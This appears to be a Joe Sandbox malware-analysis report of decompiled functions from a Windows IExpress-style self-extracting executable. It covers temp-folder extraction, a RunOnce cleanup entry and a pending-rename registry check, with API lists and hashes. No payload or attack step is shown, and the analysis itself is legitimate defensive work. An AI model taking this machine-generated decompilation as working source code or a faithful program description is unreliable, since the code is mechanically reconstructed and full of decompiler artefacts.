                              • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                              • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                              • API String ID: 178549006-3726664654
                              • Opcode ID: 8721151be2ce48389aba8df63ad2cabe259ab1fa513347850f1c3bb4bc49dc66
                              • Instruction ID: 61413f4f215ee9dfda85ec6e159f34a4e4b34b7e3e60d47f79192310cd9be37a
                              • Opcode Fuzzy Hash: 8721151be2ce48389aba8df63ad2cabe259ab1fa513347850f1c3bb4bc49dc66
                              • Instruction Fuzzy Hash: B6510572A00214AFDB309B67DC4CFEA7BECEB54B40F0041E9BAC5EB145DA769E448B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 232 10e55a0-10e55d9 call 10e468f LocalAlloc 235 10e55fd-10e560c call 10e468f 232->235 236 10e55db-10e55f1 call 10e44b9 call 10e6285 232->236 241 10e560e-10e5630 call 10e44b9 LocalFree 235->241 242 10e5632-10e5643 lstrcmpA 235->242 248 10e55f6-10e55f8 236->248 241->248 245 10e564b-10e5659 LocalFree 242->245 246 10e5645 242->246 250 10e565b-10e565d 245->250 251 10e5696-10e569c 245->251 246->245 252 10e58b7-10e58c7 call 10e6ce0 248->252 255 10e565f-10e5667 250->255 256 10e5669 250->256 253 10e589f-10e58b5 call 10e6517 251->253 254 10e56a2-10e56a8 251->254 253->252 254->253 259 10e56ae-10e56c1 GetTempPathA 254->259 255->256 260 10e566b-10e567a call 10e5467 255->260 256->260 263 10e56f3-10e5711 call 10e1781 259->263 264 10e56c3-10e56c9 call 10e5467 259->264 269 10e589b-10e589d 260->269 270 10e5680-10e5691 call 10e44b9 260->270 274 10e586c-10e5890 GetWindowsDirectoryA call 10e597d 263->274 275 10e5717-10e5729 GetDriveTypeA 263->275 272 10e56ce-10e56d0 264->272 269->252 270->248 272->269 276 10e56d6-10e56df call 10e2630 272->276 274->263 288 10e5896 274->288 278 10e572b-10e572e 275->278 279 10e5730-10e5740 GetFileAttributesA 275->279 276->263 289 10e56e1-10e56ed call 10e5467 276->289 278->279 282 10e5742-10e5745 278->282 279->282 283 10e577e-10e578f call 10e597d 279->283 286 10e576b 282->286 287 10e5747-10e574f 282->287 295 10e57b2-10e57bf call 10e2630 283->295 296 10e5791-10e579e call 10e2630 283->296 292 10e5771-10e5779 286->292 287->292 293 10e5751-10e5753 287->293 288->269 289->263 289->269 298 10e5864-10e5866 292->298 293->292 297 10e5755-10e5762 call 10e6952 293->297 307 10e57d3-10e57f8 call 10e658a GetFileAttributesA 295->307 308 10e57c1-10e57cd GetWindowsDirectoryA 295->308 296->286 306 10e57a0-10e57b0 call 10e597d 296->306 297->286 309 10e5764-10e5769 297->309 298->274 298->275 306->286 306->295 314 10e580a 307->314 315 10e57fa-10e5808 CreateDirectoryA 307->315 308->307 309->283 309->286 316 10e580d-10e580f 314->316 315->316 317 10e5827-10e585c SetFileAttributesA call 10e1781 call 10e5467 316->317 318 10e5811-10e5825 316->318 317->269 323 10e585e 317->323 318->298 323->298
                              C-Code - Quality: 92%
                              			E010E55A0(void* __eflags) {
                              				signed int _v8;
                              				char _v265;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t28;
                              				int _t32;
                              				int _t33;
                              				int _t35;
                              				signed int _t36;
                              				signed int _t38;
                              				int _t40;
                              				int _t44;
                              				long _t48;
                              				int _t49;
                              				int _t50;
                              				signed int _t53;
                              				int _t54;
                              				int _t59;
                              				char _t60;
                              				int _t65;
                              				char _t66;
                              				int _t67;
                              				int _t68;
                              				int _t69;
                              				int _t70;
                              				int _t71;
                              				struct _SECURITY_ATTRIBUTES* _t72;
                              				int _t73;
                              				CHAR* _t82;
                              				CHAR* _t88;
                              				void* _t103;
                              				signed int _t110;
                              
                              				_t28 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t28 ^ _t110;
                              				_t2 = E010E468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                              				_t109 = LocalAlloc(0x40, _t2);
                              				if(_t109 != 0) {
                              					_t82 = "RUNPROGRAM";
                              					_t32 = E010E468F(_t82, _t109, 1);
                              					__eflags = _t32;
                              					if(_t32 != 0) {
                              						_t33 = lstrcmpA(_t109, "<None>");
                              						__eflags = _t33;
                              						if(_t33 == 0) {
                              							 *0x10e9a30 = 1;
                              						}
                              						LocalFree(_t109);
                              						_t35 =  *0x10e8b3e; // 0x0
                              						__eflags = _t35;
                              						if(_t35 == 0) {
                              							__eflags =  *0x10e8a24; // 0x0
                              							if(__eflags != 0) {
                              								L46:
                              								_t101 = 0x7d2;
                              								_t36 = E010E6517(_t82, 0x7d2, 0, E010E3210, 0, 0);
                              								asm("sbb eax, eax");
                              								_t38 =  ~( ~_t36);
                              							} else {
                              								__eflags =  *0x10e9a30; // 0x0
                              								if(__eflags != 0) {
                              									goto L46;
                              								} else {
                              									_t109 = 0x10e91e4;
                              									_t40 = GetTempPathA(0x104, 0x10e91e4);
                              									__eflags = _t40;
                              									if(_t40 == 0) {
                              										L19:
                              										_push(_t82);
                              										E010E1781( &_v268, 0x104, _t82, "A:\\");
                              										__eflags = _v268 - 0x5a;
                              										if(_v268 <= 0x5a) {
                              											do {
                              												_t109 = GetDriveTypeA( &_v268);
                              												__eflags = _t109 - 6;
                              												if(_t109 == 6) {
                              													L22:
                              													_t48 = GetFileAttributesA( &_v268);
                              													__eflags = _t48 - 0xffffffff;
                              													if(_t48 != 0xffffffff) {
                              														goto L30;
                              													} else {
                              														goto L23;
                              													}
                              												} else {
                              													__eflags = _t109 - 3;
                              													if(_t109 != 3) {
                              														L23:
                              														__eflags = _t109 - 2;
                              														if(_t109 != 2) {
                              															L28:
                              															_t66 = _v268;
                              															goto L29;
                              														} else {
                              															_t66 = _v268;
                              															__eflags = _t66 - 0x41;
                              															if(_t66 == 0x41) {
                              																L29:
                              																_t60 = _t66 + 1;
                              																_v268 = _t60;
                              																goto L42;
                              															} else {
                              																__eflags = _t66 - 0x42;
                              																if(_t66 == 0x42) {
                              																	goto L29;
                              																} else {
                              																	_t68 = E010E6952( &_v268);
                              																	__eflags = _t68;
                              																	if(_t68 == 0) {
                              																		goto L28;
                              																	} else {
                              																		__eflags = _t68 - 0x19000;
                              																		if(_t68 >= 0x19000) {
                              																			L30:
                              																			_push(0);
                              																			_t103 = 3;
                              																			_t49 = E010E597D( &_v268, _t103, 1);
                              																			__eflags = _t49;
                              																			if(_t49 != 0) {
                              																				L33:
                              																				_t50 = E010E2630(0,  &_v268, 1);
                              																				__eflags = _t50;
                              																				if(_t50 != 0) {
                              																					GetWindowsDirectoryA( &_v268, 0x104);
                              																				}
                              																				_t88 =  &_v268;
                              																				E010E658A(_t88, 0x104, "msdownld.tmp");
                              																				_t53 = GetFileAttributesA( &_v268);
                              																				__eflags = _t53 - 0xffffffff;
                              																				if(_t53 != 0xffffffff) {
                              																					_t54 = _t53 & 0x00000010;
                              																					__eflags = _t54;
                              																				} else {
                              																					_t54 = CreateDirectoryA( &_v268, 0);
                              																				}
                              																				__eflags = _t54;
                              																				if(_t54 != 0) {
                              																					SetFileAttributesA( &_v268, 2);
                              																					_push(_t88);
                              																					_t109 = 0x10e91e4;
                              																					E010E1781(0x10e91e4, 0x104, _t88,  &_v268);
                              																					_t101 = 1;
                              																					_t59 = E010E5467(0x10e91e4, 1, 0);
                              																					__eflags = _t59;
                              																					if(_t59 != 0) {
                              																						goto L45;
                              																					} else {
                              																						_t60 = _v268;
                              																						goto L42;
                              																					}
                              																				} else {
                              																					_t60 = _v268 + 1;
                              																					_v265 = 0;
                              																					_v268 = _t60;
                              																					goto L42;
                              																				}
                              																			} else {
                              																				_t65 = E010E2630(0,  &_v268, 1);
                              																				__eflags = _t65;
                              																				if(_t65 != 0) {
                              																					goto L28;
                              																				} else {
                              																					_t67 = E010E597D( &_v268, 1, 1, 0);
                              																					__eflags = _t67;
                              																					if(_t67 == 0) {
                              																						goto L28;
                              																					} else {
                              																						goto L33;
                              																					}
                              																				}
                              																			}
                              																		} else {
                              																			goto L28;
                              																		}
                              																	}
                              																}
                              															}
                              														}
                              													} else {
                              														goto L22;
                              													}
                              												}
                              												goto L47;
                              												L42:
                              												__eflags = _t60 - 0x5a;
                              											} while (_t60 <= 0x5a);
                              										}
                              										goto L43;
                              									} else {
                              										_t101 = 1;
                              										_t69 = E010E5467(0x10e91e4, 1, 3); // executed
                              										__eflags = _t69;
                              										if(_t69 != 0) {
                              											goto L45;
                              										} else {
                              											_t82 = 0x10e91e4;
                              											_t70 = E010E2630(0, 0x10e91e4, 1);
                              											__eflags = _t70;
                              											if(_t70 != 0) {
                              												goto L19;
                              											} else {
                              												_t101 = 1;
                              												_t82 = 0x10e91e4;
                              												_t71 = E010E5467(0x10e91e4, 1, 1);
                              												__eflags = _t71;
                              												if(_t71 != 0) {
                              													goto L45;
                              												} else {
                              													do {
                              														goto L19;
                              														L43:
                              														GetWindowsDirectoryA( &_v268, 0x104);
                              														_push(4);
                              														_t101 = 3;
                              														_t82 =  &_v268;
                              														_t44 = E010E597D(_t82, _t101, 1);
                              														__eflags = _t44;
                              													} while (_t44 != 0);
                              													goto L2;
                              												}
                              											}
                              										}
                              									}
                              								}
                              							}
                              						} else {
                              							__eflags = _t35 - 0x5c;
                              							if(_t35 != 0x5c) {
                              								L10:
                              								_t72 = 1;
                              							} else {
                              								__eflags =  *0x10e8b3f - _t35; // 0x0
                              								_t72 = 0;
                              								if(__eflags != 0) {
                              									goto L10;
                              								}
                              							}
                              							_t101 = 0;
                              							_t73 = E010E5467(0x10e8b3e, 0, _t72);
                              							__eflags = _t73;
                              							if(_t73 != 0) {
                              								L45:
                              								_t38 = 1;
                              							} else {
                              								_t101 = 0x4be;
                              								E010E44B9(0, 0x4be, 0, 0, 0x10, 0);
                              								goto L2;
                              							}
                              						}
                              					} else {
                              						_t101 = 0x4b1;
                              						E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                              						LocalFree(_t109);
                              						 *0x10e9124 = 0x80070714;
                              						goto L2;
                              					}
                              				} else {
                              					_t101 = 0x4b5;
                              					E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                              					 *0x10e9124 = E010E6285();
                              					L2:
                              					_t38 = 0;
                              				}
                              				L47:
                              				return E010E6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                              			}





































                              0x010e55ab
                              0x010e55b2
                              0x010e55c9
                              0x010e55d5
                              0x010e55d9
                              0x010e5600
                              0x010e5605
                              0x010e560a
                              0x010e560c
                              0x010e5638
                              0x010e5641
                              0x010e5643
                              0x010e5645
                              0x010e5645
                              0x010e564c
                              0x010e5652
                              0x010e5657
                              0x010e5659
                              0x010e5696
                              0x010e569c
                              0x010e589f
                              0x010e58a7
                              0x010e58ac
                              0x010e58b3
                              0x010e58b5
                              0x010e56a2
                              0x010e56a2
                              0x010e56a8
                              0x00000000
                              0x010e56ae
                              0x010e56ae
                              0x010e56b9
                              0x010e56bf
                              0x010e56c1
                              0x010e56f3
                              0x010e56f3
                              0x010e5705
                              0x010e570a
                              0x010e5711
                              0x010e5717
                              0x010e5724
                              0x010e5726
                              0x010e5729
                              0x010e5730
                              0x010e5737
                              0x010e573d
                              0x010e5740
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e572b
                              0x010e572b
                              0x010e572e
                              0x010e5742
                              0x010e5742
                              0x010e5745
                              0x010e576b
                              0x010e576b
                              0x00000000
                              0x010e5747
                              0x010e5747
                              0x010e574d
                              0x010e574f
                              0x010e5771
                              0x010e5771
                              0x010e5773
                              0x00000000
                              0x010e5751
                              0x010e5751
                              0x010e5753
                              0x00000000
                              0x010e5755
                              0x010e575b
                              0x010e5760
                              0x010e5762
                              0x00000000
                              0x010e5764
                              0x010e5764
                              0x010e5769
                              0x010e577e
                              0x010e577e
                              0x010e5781
                              0x010e5788
                              0x010e578d
                              0x010e578f
                              0x010e57b2
                              0x010e57b8
                              0x010e57bd
                              0x010e57bf
                              0x010e57cd
                              0x010e57cd
                              0x010e57dd
                              0x010e57e3
                              0x010e57ef
                              0x010e57f5
                              0x010e57f8
                              0x010e580a
                              0x010e580a
                              0x010e57fa
                              0x010e5802
                              0x010e5802
                              0x010e580d
                              0x010e580f
                              0x010e5830
                              0x010e5836
                              0x010e583d
                              0x010e584b
                              0x010e5851
                              0x010e5855
                              0x010e585a
                              0x010e585c
                              0x00000000
                              0x010e585e
                              0x010e585e
                              0x00000000
                              0x010e585e
                              0x010e5811
                              0x010e5817
                              0x010e5819
                              0x010e581f
                              0x00000000
                              0x010e581f
                              0x010e5791
                              0x010e5797
                              0x010e579c
                              0x010e579e
                              0x00000000
                              0x010e57a0
                              0x010e57a9
                              0x010e57ae
                              0x010e57b0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e57b0
                              0x010e579e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e5769
                              0x010e5762
                              0x010e5753
                              0x010e574f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e572e
                              0x00000000
                              0x010e5864
                              0x010e5864
                              0x010e5864
                              0x010e5717
                              0x00000000
                              0x010e56c3
                              0x010e56c5
                              0x010e56c9
                              0x010e56ce
                              0x010e56d0
                              0x00000000
                              0x010e56d6
                              0x010e56d6
                              0x010e56d8
                              0x010e56dd
                              0x010e56df
                              0x00000000
                              0x010e56e1
                              0x010e56e2
                              0x010e56e4
                              0x010e56e6
                              0x010e56eb
                              0x010e56ed
                              0x00000000
                              0x010e56f3
                              0x010e56f3
                              0x00000000
                              0x010e586c
                              0x010e5878
                              0x010e587e
                              0x010e5882
                              0x010e5883
                              0x010e5889
                              0x010e588e
                              0x010e588e
                              0x00000000
                              0x010e5896
                              0x010e56ed
                              0x010e56df
                              0x010e56d0
                              0x010e56c1
                              0x010e56a8
                              0x010e565b
                              0x010e565b
                              0x010e565d
                              0x010e5669
                              0x010e5669
                              0x010e565f
                              0x010e565f
                              0x010e5665
                              0x010e5667
                              0x00000000
                              0x00000000
                              0x010e5667
                              0x010e566c
                              0x010e5673
                              0x010e5678
                              0x010e567a
                              0x010e589b
                              0x010e589b
                              0x010e5680
                              0x010e5685
                              0x010e568c
                              0x00000000
                              0x010e568c
                              0x010e567a
                              0x010e560e
                              0x010e5613
                              0x010e561a
                              0x010e5620
                              0x010e5626
                              0x00000000
                              0x010e5626
                              0x010e55db
                              0x010e55e0
                              0x010e55e7
                              0x010e55f1
                              0x010e55f6
                              0x010e55f6
                              0x010e55f6
                              0x010e58b7
                              0x010e58c7

                              APIs
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010E55CF
                              • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 010E5638
                              • LocalFree.KERNEL32(00000000), ref: 010E564C
                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010E5620
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010E56B9
                              • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 010E571E
                              • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 010E5737
                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010E57CD
                              • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010E57EF
                              • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 010E5802
                                • Part of subcall function 010E2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 010E2654
                              • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 010E5830
                                • Part of subcall function 010E6517: FindResourceA.KERNEL32(010E0000,000007D6,00000005), ref: 010E652A
                                • Part of subcall function 010E6517: LoadResource.KERNEL32(010E0000,00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010E6538
                                • Part of subcall function 010E6517: DialogBoxIndirectParamA.USER32(010E0000,00000000,00000547,010E19E0,00000000), ref: 010E6557
                                • Part of subcall function 010E6517: FreeResource.KERNEL32(00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010E6560
                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 010E5878
                                • Part of subcall function 010E597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010E59A8
                                • Part of subcall function 010E597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010E59AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                              • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                              • API String ID: 2436801531-2740620654
                              • Opcode ID: 043b7ae93401bc05e8733c1f9889c07bd3139377ff3e15e46f90ae129188c951
                              • Instruction ID: cff82595484126ce4bf40ebe1460c108c5ba3033df425f3ff7bbb180b8dc6486
                              • Opcode Fuzzy Hash: 043b7ae93401bc05e8733c1f9889c07bd3139377ff3e15e46f90ae129188c951
                              • Instruction Fuzzy Hash: 4A812A79B042059EDB719A379D4CBFE76EDAB64708F0408E6E5C6E7180DFB48D818B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 95%
                              			E010E53A1(CHAR* __ecx, CHAR* __edx) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t5;
                              				long _t13;
                              				int _t14;
                              				CHAR* _t20;
                              				int _t29;
                              				int _t30;
                              				CHAR* _t32;
                              				signed int _t33;
                              				void* _t34;
                              
                              				_t5 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t5 ^ _t33;
                              				_t32 = __edx;
                              				_t20 = __ecx;
                              				_t29 = 0;
                              				while(1) {
                              					E010E171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                              					_t34 = _t34 + 0x10;
                              					_t29 = _t29 + 1;
                              					E010E1680(_t32, 0x104, _t20);
                              					E010E658A(_t32, 0x104,  &_v268); // executed
                              					RemoveDirectoryA(_t32); // executed
                              					_t13 = GetFileAttributesA(_t32); // executed
                              					if(_t13 == 0xffffffff) {
                              						break;
                              					}
                              					if(_t29 < 0x190) {
                              						continue;
                              					}
                              					L3:
                              					_t30 = 0;
                              					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                              						_t30 = 1;
                              						DeleteFileA(_t32);
                              						CreateDirectoryA(_t32, 0);
                              					}
                              					L5:
                              					return E010E6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                              				}
                              				_t14 = CreateDirectoryA(_t32, 0); // executed
                              				if(_t14 == 0) {
                              					goto L3;
                              				}
                              				_t30 = 1;
                              				 *0x10e8a20 = 1;
                              				goto L5;
                              			}

















                              0x010e53ac
                              0x010e53b3
                              0x010e53b9
                              0x010e53bb
                              0x010e53bd
                              0x010e53bf
                              0x010e53d1
                              0x010e53d6
                              0x010e53e0
                              0x010e53e2
                              0x010e53f5
                              0x010e53fb
                              0x010e5402
                              0x010e540b
                              0x00000000
                              0x00000000
                              0x010e5413
                              0x00000000
                              0x00000000
                              0x010e5415
                              0x010e5416
                              0x010e5427
                              0x010e542a
                              0x010e542b
                              0x010e5434
                              0x010e5434
                              0x010e543a
                              0x010e544c
                              0x010e544c
                              0x010e5452
                              0x010e545a
                              0x00000000
                              0x00000000
                              0x010e545e
                              0x010e545f
                              0x00000000

                              APIs
                                • Part of subcall function 010E171E: _vsnprintf.MSVCRT ref: 010E1750
                              • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E53FB
                              • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E5402
                              • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E541F
                              • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E542B
                              • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E5434
                              • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E5452
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                              • API String ID: 1082909758-775753704
                              • Opcode ID: 0f262f1d7a1493f7273ca7ce618721fd36e24b9dcdea7b91d1d906cb790ec2fa
                              • Instruction ID: 6a0d9dcecac6b2ca5434bdcc4a162de7b2fdb8969ef20146aeea750450ce180b
                              • Opcode Fuzzy Hash: 0f262f1d7a1493f7273ca7ce618721fd36e24b9dcdea7b91d1d906cb790ec2fa
                              • Instruction Fuzzy Hash: 0F11E671700104ABE7209A379C4CFEF3AEDEBD5B25F004465B6C697180CE7989428760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 519 10e256d-10e257d 520 10e2622-10e2627 call 10e24e0 519->520 521 10e2583-10e2589 519->521 528 10e2629-10e262f 520->528 523 10e258b 521->523 524 10e25e8-10e2607 RegOpenKeyExA 521->524 523->528 529 10e2591-10e2595 523->529 525 10e2609-10e2620 RegQueryInfoKeyA 524->525 526 10e25e3-10e25e6 524->526 530 10e25d1-10e25dd RegCloseKey 525->530 526->528 529->528 531 10e259b-10e25ba RegOpenKeyExA 529->531 530->526 531->526 532 10e25bc-10e25cb RegQueryValueExA 531->532 532->530
                              C-Code - Quality: 86%
                              			E010E256D(signed int __ecx) {
                              				int _v8;
                              				void* _v12;
                              				signed int _t13;
                              				signed int _t19;
                              				long _t24;
                              				void* _t26;
                              				int _t31;
                              				void* _t34;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t13 = __ecx & 0x0000ffff;
                              				_t31 = 0;
                              				if(_t13 == 0) {
                              					_t31 = E010E24E0(_t26);
                              				} else {
                              					_t34 = _t13 - 1;
                              					if(_t34 == 0) {
                              						_v8 = 0;
                              						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                              							goto L7;
                              						} else {
                              							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                              							goto L6;
                              						}
                              						L12:
                              					} else {
                              						if(_t34 > 0 && __ecx <= 3) {
                              							_v8 = 0;
                              							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                              							if(_t24 == 0) {
                              								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                              								L6:
                              								asm("sbb eax, eax");
                              								_v8 = _v8 &  !( ~_t19);
                              								RegCloseKey(_v12); // executed
                              							}
                              							L7:
                              							_t31 = _v8;
                              						}
                              					}
                              				}
                              				return _t31;
                              				goto L12;
                              			}











                              0x010e2572
                              0x010e2573
                              0x010e2575
                              0x010e2578
                              0x010e257d
                              0x010e2627
                              0x010e2583
                              0x010e2586
                              0x010e2589
                              0x010e25eb
                              0x010e2607
                              0x00000000
                              0x010e2609
                              0x010e261a
                              0x00000000
                              0x010e261a
                              0x00000000
                              0x010e258b
                              0x010e258b
                              0x010e259e
                              0x010e25b2
                              0x010e25ba
                              0x010e25cb
                              0x010e25d1
                              0x010e25d6
                              0x010e25da
                              0x010e25dd
                              0x010e25dd
                              0x010e25e3
                              0x010e25e3
                              0x010e25e3
                              0x010e258b
                              0x010e2589
                              0x010e262f
                              0x00000000

                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,010E4096,010E4096,?,010E1ED3,00000001,00000000,?,?,010E4137,?), ref: 010E25B2
                              • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,010E4096,?,010E1ED3,00000001,00000000,?,?,010E4137,?,010E4096), ref: 010E25CB
                              • RegCloseKey.KERNELBASE(?,?,010E1ED3,00000001,00000000,?,?,010E4137,?,010E4096), ref: 010E25DD
                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,010E4096,010E4096,?,010E1ED3,00000001,00000000,?,?,010E4137,?), ref: 010E25FF
                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,010E4096,00000000,00000000,00000000,00000000,?,010E1ED3,00000001,00000000), ref: 010E261A
                              Strings
                              • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010E25F5
                              • System\CurrentControlSet\Control\Session Manager, xrefs: 010E25A8
                              • PendingFileRenameOperations, xrefs: 010E25C3
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: OpenQuery$CloseInfoValue
                              • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                              • API String ID: 2209512893-559176071
                              • Opcode ID: f663290c762d9626766ee04d7c4884a31513647bc968820e24f38837f93f80da
                              • Instruction ID: d49b77bffc8b3a3f50410c9e8e88aa2efa433491c4373ba15a07496f1dd30b04
                              • Opcode Fuzzy Hash: f663290c762d9626766ee04d7c4884a31513647bc968820e24f38837f93f80da
                              • Instruction Fuzzy Hash: 90116335902228FFDB20DB979C0DDFF7EFCEB056A1F114195B989A2000D6714A44D6A0
                              Uniqueness

